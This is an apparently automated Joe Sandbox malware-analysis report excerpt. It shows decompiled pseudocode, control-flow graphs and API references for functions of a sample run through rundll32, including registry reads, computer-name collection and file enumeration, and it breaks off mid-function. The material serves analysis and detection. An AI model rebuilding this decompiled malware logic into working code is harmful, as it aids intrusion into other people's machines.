                                          • Executed
                                          • Not Executed
                                          control_flow_graph 388 67768cf-67768e9 call 6779138 391 67768ee-6776907 call 6771b13 388->391 392 67768eb 388->392 394 677690c-6776910 391->394 392->391 395 6776916-6776930 StrToIntExW 394->395 396 67769cf-67769d4 394->396 399 6776936-6776952 call 6775fcb 395->399 400 67769bf-67769c1 395->400 397 67769d6 call 677568a 396->397 398 67769db-67769e1 396->398 397->398 401 67769c2-67769cd HeapFree 399->401 405 6776954-677696d call 67775e7 399->405 400->401 401->396 408 677698f-67769bd call 6771bc1 HeapFree 405->408 409 677696f-6776976 405->409 408->401 409->408 410 6776978-677698a call 67775e7 409->410 410->408
                                          C-Code - Quality: 100%
                                          			E067768CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E06779138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x677d2a4; // 0x4ca5a8
				_t4 = _t24 + 0x677ede0; // 0x6c49388
				_t5 = _t24 + 0x677ed88; // 0x4f0053
				_t26 = E06771B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x677d2a4; // 0x4ca5a8
						_t11 = _t32 + 0x677edd4; // 0x6c4937c
						_t48 = _t11;
						_t12 = _t32 + 0x677ed88; // 0x4f0053
						_t51 = E06775FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x677d2a4; // 0x4ca5a8
							_t13 = _t35 + 0x677ea59; // 0x30314549
							if(E067775E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x677d25c - 6;
								if( *0x677d25c <= 6) {
									_t42 =  *0x677d2a4; // 0x4ca5a8
									_t15 = _t42 + 0x677ec3a; // 0x52384549
									E067775E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x677d2a4; // 0x4ca5a8
							_t17 = _t38 + 0x677ee18; // 0x6c493c0
							_t18 = _t38 + 0x677edf0; // 0x680043
							_t45 = E06771BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x677d238, 0, _t51);
						}
					}
					HeapFree( *0x677d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E0677568A(_t53);
				}
				return _t45;
			}

















                                          0x067768df
                                          0x067768e2
                                          0x067768e9
                                          0x067768eb
                                          0x067768eb
                                          0x067768ee
                                          0x067768f3
                                          0x067768fa
                                          0x06776907
                                          0x0677690c
                                          0x06776910
                                          0x0677691e
                                          0x0677692c
                                          0x06776930
                                          0x067769c1
                                          0x067769c1
                                          0x06776936
                                          0x06776936
                                          0x0677693b
                                          0x0677693b
                                          0x06776942
                                          0x0677694e
                                          0x06776950
                                          0x06776952
                                          0x06776954
                                          0x0677695b
                                          0x0677696d
                                          0x0677696f
                                          0x06776976
                                          0x06776978
                                          0x0677697f
                                          0x0677698a
                                          0x0677698a
                                          0x06776976
                                          0x0677698f
                                          0x06776994
                                          0x0677699b
                                          0x067769b9
                                          0x067769bb
                                          0x067769bb
                                          0x06776952
                                          0x067769cd
                                          0x067769cd
                                          0x067769cf
                                          0x067769d4
                                          0x067769d6
                                          0x067769d6
                                          0x067769e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06C49388,00000000,?,7519F710,00000000,7519F730), ref: 0677691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06C493C0,?,00000000,30314549,00000014,004F0053,06C4937C), ref: 067769BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,06779C10), ref: 067769CD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: acc5def7ea58aaa23405e680c8b91b43b9808f51acc2bf9c3c2966c18df416a5
                                          • Instruction ID: 83fe5f4b9eb540d0e32a52181a3fc371a315057e2d22a5cbe3d8f201383068a7
                                          • Opcode Fuzzy Hash: acc5def7ea58aaa23405e680c8b91b43b9808f51acc2bf9c3c2966c18df416a5
                                          • Instruction Fuzzy Hash: 78317E72A00109BFDF61EBA4DC88EAABBBEEF44710F1540A9B604AB114E7719A15DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06779F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 414 6779f11-6779f39 415 6779f3b-6779f43 RtlAllocateHeap 414->415 416 6779f59-6779f61 RtlAllocateHeap 414->416 417 6779f45-6779f52 call 6771754 415->417 418 6779f79-6779f7b 415->418 416->418 419 6779f63-6779f70 call 677514f 416->419 423 6779f57 417->423 422 6779f7c-6779f7e 418->422 424 6779f75-6779f77 419->424 425 6779f80-6779fa1 call 6777cf7 call 67760cf 422->425 426 6779fbc 422->426 423->424 424->422 432 6779fa3-6779fb6 call 6776106 HeapFree 425->432 433 6779fcb-6779fdc 425->433 427 6779fc2-6779fc8 426->427 432->426 433->427 435 6779fde-6779fe5 433->435 435->427
                                          C-Code - Quality: 58%
                                          			E06779F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x677d2a4; // 0x4ca5a8
				_push(0x800);
				_push(0);
				_push( *0x677d238);
				_t1 = _t43 + 0x677e791; // 0x6976612e
				_t44 = _t1;
				if( *0x677d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x677d24c =  *0x677d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E06777CF7(_a4, _t41);
						_t19 = E067760CF(_t41, _t41, _t46);
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x677d24c < 5) {
								 *0x677d24c =  *0x677d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E06776106();
						HeapFree( *0x677d238, 0, _t41);
						goto L10;
					}
					_t25 = E0677514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t25 = E06771754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}












                                          0x06779f11
                                          0x06779f11
                                          0x06779f14
                                          0x06779f15
                                          0x06779f1f
                                          0x06779f26
                                          0x06779f2b
                                          0x06779f2d
                                          0x06779f33
                                          0x06779f33
                                          0x06779f39
                                          0x06779f61
                                          0x06779f79
                                          0x06779f7b
                                          0x06779f7c
                                          0x06779f7e
                                          0x06779fbc
                                          0x06779fbc
                                          0x06779fc2
                                          0x06779fc8
                                          0x06779fc8
                                          0x06779f80
                                          0x06779f86
                                          0x06779f89
                                          0x06779f98
                                          0x06779f9a
                                          0x06779fa1
                                          0x06779fd5
                                          0x06779fda
                                          0x06779fdc
                                          0x06779fde
                                          0x06779fde
                                          0x00000000
                                          0x06779fdc
                                          0x06779fa3
                                          0x06779fa8
                                          0x06779fb6
                                          0x00000000
                                          0x06779fb6
                                          0x06779f70
                                          0x06779f75
                                          0x06779f75
                                          0x00000000
                                          0x06779f75
                                          0x06779f43
                                          0x00000000
                                          0x00000000
                                          0x06779f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 06779F3B
                                            • Part of subcall function 06771754: GetTickCount.KERNEL32 ref: 06771768
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 067717B8
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 067717D5
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 06771801
                                            • Part of subcall function 06771754: HeapFree.KERNEL32(00000000,?), ref: 06771813
                                            • Part of subcall function 06771754: wsprintfA.USER32 ref: 06771834
                                            • Part of subcall function 06771754: HeapFree.KERNEL32(00000000,?), ref: 06771844
                                            • Part of subcall function 06771754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 06771872
                                            • Part of subcall function 06771754: GetTickCount.KERNEL32 ref: 06771883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 06779F59
                                          • HeapFree.KERNEL32(00000000,?,?,?,06779C62,00000002,?,?,?,?), ref: 06779FB6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: d01eb736620b00387a3283a0b50180b7552a702f4dc513a32614e8fd390e7691
                                          • Instruction ID: 89173f4ed671f46c279790637ac7a2e0ca0e976944268dc3355fc285ee3f39d3
                                          • Opcode Fuzzy Hash: d01eb736620b00387a3283a0b50180b7552a702f4dc513a32614e8fd390e7691
                                          • Instruction Fuzzy Hash: 63215972211204AFDF91DF68DC48AAA37ADEF49340F108026FB02D7250DB70E946CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0677642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E06774FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x677d2a4; // 0x4ca5a8
						_t20 = _t68 + 0x677e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E06775103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x06776432
                                          0x06776435
                                          0x06776445
                                          0x0677644e
                                          0x06776452
                                          0x06776520
                                          0x06776526
                                          0x06776526
                                          0x0677646c
                                          0x06776471
                                          0x06776475
                                          0x0677647b
                                          0x06776480
                                          0x06776487
                                          0x06776496
                                          0x06776496
                                          0x0677649a
                                          0x0677649c
                                          0x067764a8
                                          0x067764b3
                                          0x067764be
                                          0x067764c2
                                          0x067764cc
                                          0x067764d0
                                          0x067764d2
                                          0x067764d7
                                          0x067764de
                                          0x067764ee
                                          0x067764ee
                                          0x067764d7
                                          0x067764d0
                                          0x067764f0
                                          0x067764f5
                                          0x067764fa
                                          0x067764fa
                                          0x067764fd
                                          0x06776506
                                          0x0677650b
                                          0x0677650b
                                          0x06776510
                                          0x06776515
                                          0x06776515
                                          0x06776510
                                          0x0677649a
                                          0x06776517
                                          0x0677651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 06774FFA: SysAllocString.OLEAUT32(80000002), ref: 06775057
                                            • Part of subcall function 06774FFA: SysFreeString.OLEAUT32(00000000), ref: 067750BD
                                          • SysFreeString.OLEAUT32(?), ref: 0677650B
                                          • SysFreeString.OLEAUT32(0677A6F4), ref: 06776515
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: f4edce3381657d2f36f9b6830fa77225708a141dad27a309d459816881f62e1f
                                          • Instruction ID: a9ee5917cdbd0c049050c502661d66fd456ab0af35b2e909d0a531baa394359a
                                          • Opcode Fuzzy Hash: f4edce3381657d2f36f9b6830fa77225708a141dad27a309d459816881f62e1f
                                          • Instruction Fuzzy Hash: FE317A71900549AFCF21DF68CC88CABBB7AFFC96407144658F9159B218E231DD81DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067773E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E067773E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E067758BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0677147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x067773ee
                                          0x067773f9
                                          0x067773fb
                                          0x06777401
                                          0x06777403
                                          0x06777408
                                          0x06777411
                                          0x06777415
                                          0x0677741e
                                          0x06777422
                                          0x06777431
                                          0x06777424
                                          0x06777425
                                          0x0677742a
                                          0x0677742a
                                          0x06777422
                                          0x06777415
                                          0x0677743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,067751DC,7519F710,00000000,?,?,067751DC), ref: 06777401
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,067751DC,067751DD,?,?,067751DC), ref: 0677741E
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 6dd5d2de6b37951816266abc27456f79c9255cfea55b08cace66d2e70fc52231
                                          • Instruction ID: e73f7ae60146725fb575b6cfffbfe4d1ff1cc816e4b3fd476cb66a5d3e034c12
                                          • Opcode Fuzzy Hash: 6dd5d2de6b37951816266abc27456f79c9255cfea55b08cace66d2e70fc52231
                                          • Instruction Fuzzy Hash: 54F0B426B10109BAEF51DAB98C04EAF7ABDDBC5640F200059A914E3104EA70DF0197B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06777BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E06777BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x677d2a4; // 0x4ca5a8
				_t4 = _t15 + 0x677e39c; // 0x6c48944
				_t20 = _t4;
				_t6 = _t15 + 0x677e124; // 0x650047
				_t17 = E0677642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E06774CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x06777bb3
                                          0x06777bba
                                          0x06777bbb
                                          0x06777bbc
                                          0x06777bbd
                                          0x06777bc3
                                          0x06777bc8
                                          0x06777bc8
                                          0x06777bd2
                                          0x06777be4
                                          0x06777beb
                                          0x06777c19
                                          0x06777bed
                                          0x06777bef
                                          0x06777bf4
                                          0x06777c16
                                          0x06777bf6
                                          0x06777bf9
                                          0x06777c00
                                          0x06777c05
                                          0x06777c07
                                          0x06777c07
                                          0x06777c0c
                                          0x06777c0c
                                          0x06777bf4
                                          0x06777c20

                                          APIs
                                            • Part of subcall function 0677642C: SysFreeString.OLEAUT32(?), ref: 0677650B
                                            • Part of subcall function 06774CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0677358E,004F0053,00000000,?), ref: 06774CDC
                                            • Part of subcall function 06774CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0677358E,004F0053,00000000,?), ref: 06774D06
                                            • Part of subcall function 06774CD3: memset.NTDLL ref: 06774D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 06777C0C
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 5bb0976ba90278973de671f65d831230c6ddb1020a84915ba4064ba10efc161a
                                          • Instruction ID: 8627c368d5067876bcfe89b964e19d2f40b1887717349be03e51b79272ea3d9a
                                          • Opcode Fuzzy Hash: 5bb0976ba90278973de671f65d831230c6ddb1020a84915ba4064ba10efc161a
                                          • Instruction Fuzzy Hash: 1301B17150001ABFDF959FA4CC04DAABBBDEF08211F004961EA05E7020E3719962CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06779347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E06779347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x677d330;
				E0677684E();
				while(1) {
					_t8 = E067732BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E0677A5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x677d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E0677684E();
					if(_t19 != 0) {
						_t22 =  *0x677d338; // 0x6c49b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x0677934f
                                          0x06779353
                                          0x06779354
                                          0x06779355
                                          0x0677935a
                                          0x0677935f
                                          0x06779366
                                          0x0677936d
                                          0x00000000
                                          0x00000000
                                          0x0677936f
                                          0x06779374
                                          0x06779375
                                          0x0677937c
                                          0x06779396
                                          0x00000000
                                          0x0677937e
                                          0x0677937e
                                          0x06779380
                                          0x06779383
                                          0x06779387
                                          0x00000000
                                          0x00000000
                                          0x06779389
                                          0x06779387
                                          0x0677939e
                                          0x0677939e
                                          0x067793a0
                                          0x067793a7
                                          0x067793a9
                                          0x067793af
                                          0x067793b6
                                          0x067793c6
                                          0x067793be
                                          0x067793c1
                                          0x067793c1
                                          0x067793c9
                                          0x067793c9
                                          0x067793d2
                                          0x067793d2
                                          0x0677939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0677684E: GetProcAddress.KERNEL32(36776F57,0677935F), ref: 06776869
                                            • Part of subcall function 067732BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 067732E5
                                            • Part of subcall function 067732BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 06773307
                                            • Part of subcall function 067732BA: memset.NTDLL ref: 06773321
                                            • Part of subcall function 067732BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0677335F
                                            • Part of subcall function 067732BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 06773373
                                            • Part of subcall function 067732BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 0677338A
                                            • Part of subcall function 067732BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 06773396
                                            • Part of subcall function 067732BA: lstrcat.KERNEL32(?,642E2A5C), ref: 067733D7
                                            • Part of subcall function 067732BA: FindFirstFileA.KERNEL32(?,?), ref: 067733ED
                                            • Part of subcall function 0677A5E9: lstrlen.KERNEL32(?,00000000,0677D330,00000001,0677937A,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?), ref: 0677A5F2
                                            • Part of subcall function 0677A5E9: mbstowcs.NTDLL ref: 0677A619
                                            • Part of subcall function 0677A5E9: memset.NTDLL ref: 0677A62B
                                          • HeapFree.KERNEL32(00000000,0677D00C,0677D00C,0677D00C,00000000,00000005,00000000,00000000,?,?,?,0677207E,?,0677D00C,?,?), ref: 06779396
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 3b85901d9b3a763dcfebcbefb190f7f5078feb5131ad8a064943f9dd382de014
                                          • Instruction ID: 146ce5f1f1f6bb2a11279d8ddee55c8df75b99ed204c86add3595e279a9256c8
                                          • Opcode Fuzzy Hash: 3b85901d9b3a763dcfebcbefb190f7f5078feb5131ad8a064943f9dd382de014
                                          • Instruction Fuzzy Hash: 4A012831601305AEEF905FB6CD84B7EB6A9EF46264F001036FB4CC60C0D6A08C81D3A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06771B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E06771B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E06777BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E067774B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x677d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x06771b1b
                                          0x06771b72
                                          0x06771b77
                                          0x06771b1d
                                          0x06771b37
                                          0x06771b3b
                                          0x06771b40
                                          0x06771b42
                                          0x06771b54
                                          0x06771b60
                                          0x06771b44
                                          0x06771b44
                                          0x06771b49
                                          0x06771b4e
                                          0x06771b4e
                                          0x06771b42
                                          0x06771b3b
                                          0x06771b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0677690C,?,004F0053,06C49388,00000000,?), ref: 06771B60
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 304a461d5e5c49e40cce27d6c343187584fa2048dfeb5d0ad328a965015d9a71
                                          • Instruction ID: 91d0a627fdd03c1ada87009efb31f9e85703fde9362d2e671680a79c81e934c7
                                          • Opcode Fuzzy Hash: 304a461d5e5c49e40cce27d6c343187584fa2048dfeb5d0ad328a965015d9a71
                                          • Instruction Fuzzy Hash: 63016232100209FBDF62DFA4DC05FAA3B69EF04360F44C415FA199A270E7309920D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677A872, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0677A872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
